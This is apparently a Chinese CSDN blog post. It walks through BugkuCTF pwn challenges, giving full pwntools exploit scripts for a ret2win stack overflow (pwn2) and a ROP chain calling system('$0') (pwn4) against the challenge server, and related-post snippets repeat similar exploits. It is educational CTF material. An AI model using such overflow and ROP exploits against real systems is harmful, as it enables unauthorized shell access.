BugkuCTF刷题 pwn

于 2022-04-02 19:06:53 发布
阅读量593 收藏 1
点赞数
分类专栏: CTF 文章标签: BugkuCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43935969/article/details/104457150
版权

唉,觉得自己TCL,栈溢出知识点差不多都会了,可是题目做不出来啊啊啊啊!缺少锻炼吧,这两天把BugkuCTF上面的pwn题做一下吧。。。

pwn1

只给了连接

第一次,才50分,想来不会太难,连上去

果然,连接就能拿flag

pwn2

一道非常基础的栈溢出。。。把返回函数地址填错了,结果搞了好久。。

64位的程序

什么保护也没开

拖进ida里面看一下

s在rbp-30h,所以需要覆盖的长度就是0x30+0x8

利用的函数,查找一下字符串

找到对应的函数

对应的地址为:0x400751

接着就可以写exp了:

#coding=utf-8
from pwn import *
p = remote('114.116.54.89',10003)#远程连接到题目给的端口
sys_addr = 0x400751#

p.recvuntil("?")#接受到?
payload = 0x38*'a'+p64(sys_addr)
p.sendline(payload)#将我们构造好的payload发送过去
p.interactive()

运行结果如下:

【注:程序中有system函数,但不是调用它,因为参数,我们要找参数已经传入的get_shell函数】

pwn4

这些都和pwn2的一样

程序中没有‘/bin/sh’字符串

但是有system函数

拖进ida,查看main函数

很明显的栈溢出,覆盖量为0x10+0x8=0x18

那接下来怎么办呢?8会。。。

参考大佬博客,发现‘/bin/sh’可以可以用‘$0’来代替

搜索字符串,找到

可以从0x601100开始往后数数,也可以从0x601122往前数,$是占两 字节,别的一个字节,可以得到'$0'的地址是0x601122-0x3=0x60111f

因为64位的程序,只有一个参数的system函数,它的参数保存在rdi中,所以,我们要先找一个pop rdi

然后构造 覆盖量 + pop rdi + 参数 + system地址

这样,pop rdi的时候,就可以把参数放入rdi中了,然后,system覆盖返回地址,get shell

exp如下:

from pwn import *

p = remote('114.116.54.89',10004)
sys_addr = 0x400570
binsh_addr = 0x60111f
pop_rdi = 0x04007d3 

p.recvuntil("Come on,try to pwn me")
payload = 0x18*'a'+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
p.sendline(payload)
p.interactive()

执行效果:

【注意程序是32位和64位参数的不一样,32位是将参数压入栈中的,而64位是将参数放在寄存器中保管的】

小白一开始想把参数传入栈内,然后将地址拿过来用,结果不行。。。纳闷了好久。。。

emm,不知道啥时候写的,草稿箱里的,,,

BugkuCTF pwn1 pwn2 pwn4 pwn5 pwn3 详细writeup【橘小白】_橘小白的博客-CSDN博客_bugkuctf pwn

书文的学习记录本
关注
专栏目录
BugkuCTF pwn题第一弹
weixin_43489686的博客
09-09 2146
BugkuCTF pwn题第一弹
BugkuCTF-PWN题canary超详细讲解
am_03的博客
08-31 2353
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解题流程 题目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
BugkuCTF pwn pwn1
H4ppyD0g的博客
08-17 1300
1 pwn1 ubuntu下输入 nc 114.116.54.89 10001 然后ls查看该目录下文件,发现有flag文件, cat flag 获取flag。 nc 主机的ip或域名端口号 作用是建立于对应ip或端口的链接,相当于一个后门web shell,可以进行访问等操作。 nc的作用还有很多,这里只是最简单的应用。 ...
bugku ctf pwn1 (nc 114.116.54.89 10001)
qq_42777804的博客
06-17 1万+
nc 114.116.54.89 10001 在Linux里面运行 nc 114.116.54.89 10001 ( nc命令用于设置路由器。) 之后用 ls -l 命令 (ls命令用于显示指定工作目录下之内容(列出目前工作目录所含之文件及子目录)。) (-l 除文件名称外,亦将文件型态、权限、拥有者、文件大小等资讯详细列出) 发现flag 使用命令 :...
[Bugku CTF——Pwn] pwn4
Y_peak的博客
03-22 558
[Bugku CTF——Pwn] pwn4 题目地址:https://ctf.bugku.com/ 给的提示很清楚,绕过canary保护 那就绕过就好 题目当中有system函数 利用ROPgadget就好 思路 将canary低位的 ‘\x00’ 给覆盖掉, 就可以利用 %s 将其输出, leek出来 exploit from pwn import * #p = process('./pwn4_') p = remote('114.67.246.176',15541) pop_rdi = 0x00
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4246
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2216
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
BugkuCTF-PWNpwn3-read_note超详细讲解
am_03的博客
08-30 2692
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
BugkuCTF-PWNpwn6-printf超详细讲解(未提供Libc版本)
am_03的博客
08-31 1176
查看文件类型: 查看保护机制: IDA64位打开: 伪码: 查看子程序: case 2: case 3: case 1:
bugku pwn2
doudoudedi
06-04 1709
这道题是一道简单的栈溢出 直接用IDA查看 很明显的得到flag的函数 直接上exp from pwn import * p=remote('114.116.54.89',10003) p.recvuntil('something?') payload='a'*56+p64(0x400751) p.sendline(payload) p.interactive() ...
Bugku CTF
zjl12344的博客
07-11 2160
一、Simple_SSTI_1 在URL使用get函数,然后提交flag{{}},{{}}括号中包括config.SECRET_KEY 二、头等舱 Bp发送到repeater然后send看返回包 三、Source Dirsearch 扫目录 wget -r http://114.67.246.176:10491/.git 递归下载该网站目录下的文件及文件夹 git reflog 查看执行的命令日志 git show e0b8e8e 使用git show commit_id 命令
bugku 里面的五个pwn题wp
qq_36495104的博客
05-08 2247
pwn1 没给二进制文件,直接nc过去就能拿shell,查看flag,flag{6979d853add353c9} pwn2 查看保护,发现什么保护都没开启 ida反编译查看 明显栈溢出,还注意到有后门函数 只需要劫持函数的返回地址到get_shell函数,就可以用拿到flag。使用gdb调试发现,在0x38个字符后就会覆盖返回地址,所以编写脚本拿flag。 exp #pwn2.py from pwn import * #sh=process('./pwn2') sh=remote('11
0ctf_2017_babyheap
u014377094的博客
03-10 481
本人double free+fastbin攻击第一道题,看了两天,好在理解下来不难。 参考传送门[分享]0ctf2017 - babyheap-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com 惯例checksec一下 打开ida 1创建chunk,按1,2依次创建,2往里写,3free掉指定数字chunk,4print出指定chunk内容 不建议跟ida里一些函数死磕,硬读会恶心到,理解就ok。 这里先放exp,读一遍exp咱们再来解释 from pwn import
BugkuCtf-pwn2-exp
weixin_30340745的博客
08-22 392
#!/usr/bin/env python from pwn import * p = process('./pwn2') payload = 'a' * 56 + p64(0x400751) p.recvuntil('?') p.sendline(payload) print p.recvall() 转载于:https://www.cnblo...
CTF-浅尝64位栈溢出PWN
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
bugku的ctf逆向入门练习(逆向入门)
song_10的博客
11-07 7297
bugku逆向第五题:逆向入门 下载文件后发现是一个exe的可执行文件,双击出现如下界面: 还是先查壳: 发现不是有效的pe文件,用notpad打开试试: 发现是“image/png;base64”,猜测是经过base64加密的图片,将整段内容复制下来,base64转图片: 或者使用HTML的img标签的src属性(格式为:<img src "url"/>)...
第三届上海市大学生网络安全大赛 PWN200 WriteUp
s1054436218的博客
11-08 1810
这题利用了UAF漏洞,在pwnable.kr中有类似的题。简单介绍 一下什么事UAF,UAF就是use after free,就是在C++申请内存的机制中,如果上一次free掉的内存和新申请的内存大小相同,那么再次申请就会申请到刚才free掉的内存,于是例如本题中,结构体嵌套了函数,在再次申请到内存的时候,被覆盖掉原有的内存地址中,把shell的地址放到结构体调用的函数中,就会触发UAF漏洞,详情
BugkuCTF ConsoleApplication4解题思路及相关知识点
s0il的博客
08-25 834
这个题的意思是: 一共8栈灯,每盏灯的状态改变都会改变它前后挨着的两个灯的状态,要求点亮所有的灯获得flag 要求输入数的范围在1-8之间,0是重新开始 思路一: 一: 算法是1-8,8栈灯,点一个改变3状态,写脚本爆破吧!!(想模仿出题人的想法把中间过程表达出来,结果还是自己太年 轻) 贪心 ...
Bugku CTF 题目解析 (1-10题)
热门推荐
半夜好饿的博客
09-28 1万+
写在前面的话: 这里只是记录一些自己的解题思路,或者一些有关解题的乱七八糟的东西,自己是刚零基础接触这方面的东西,所以有表述不当的地方请包容,在此谢过! 1、web2 点开网址后: 解题思路:F12 打开 开发者工具看看,可以看到需要寻找的flag。 将其复制到提交框即可。 flag: KEY{Web-2-bugKssNNikls9100} 2、计算器 点开网址后: 解题思路:先提交答案...
2021 BugKu CTF AWD排位赛真题解析
CTF比赛通常分为多个环节,包括但不限于密码学(Crypto)、逆向工程(Reverse Engineering)、二进制分析(Binary Analysis)、漏洞挖掘(Pwn)、Web安全(Web)、取证(Forensics)等。在AWD模式中,所有参赛队伍...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

书文的学习记录本

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值